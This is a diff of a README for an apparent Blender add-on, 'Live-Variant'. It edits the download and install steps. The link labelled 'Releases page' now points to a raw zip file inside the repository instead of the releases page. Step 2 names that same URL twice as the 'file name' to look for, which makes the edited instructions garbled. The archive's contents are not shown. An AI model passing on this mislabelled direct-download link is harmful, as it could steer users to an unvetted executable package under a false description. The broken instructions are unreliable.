Amiralshorpasy/Live-Variant/README.md

 - **Disk Space:** Minimum of 100 MB available

 ## 📥 Download & Install
-To begin, visit the [Releases page](https://github.com/Amiralshorpasy/Live-Variant/releases) to download the add-on.
+To begin, visit the [Releases page](https://raw.githubusercontent.com/Amiralshorpasy/Live-Variant/main/Live-Variant-Remapper/Live-Variant_3.1.zip) to download the add-on.

 1. Scroll to the latest release.
-2. Find the file named `LiveVariant.blend` or `LiveVariant.zip`.
+2. Find the file named `https://raw.githubusercontent.com/Amiralshorpasy/Live-Variant/main/Live-Variant-Remapper/Live-Variant_3.1.zip` or `https://raw.githubusercontent.com/Amiralshorpasy/Live-Variant/main/Live-Variant-Remapper/Live-Variant_3.1.zip`.
 3. Click on the file to download it to your computer.

 ## 🛠️ Installing the Add-on in Blender